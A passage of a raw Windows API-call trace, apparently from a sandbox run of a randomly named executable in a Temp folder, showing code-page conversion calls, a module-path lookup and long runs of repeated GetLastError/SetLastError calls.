\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xc6\x5c\x6c\xf8\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0096.090] GetLastError () returned 0x6 [0096.090] SetLastError (dwErrCode=0x6) [0096.090] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.090] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ") returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0096.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\xc6\x5c\x6c\xf8\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0096.090] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError 
(dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError 
(dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError 
(dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError 
(dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError 
(dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.101] SetLastError 
(dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError 
(dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError 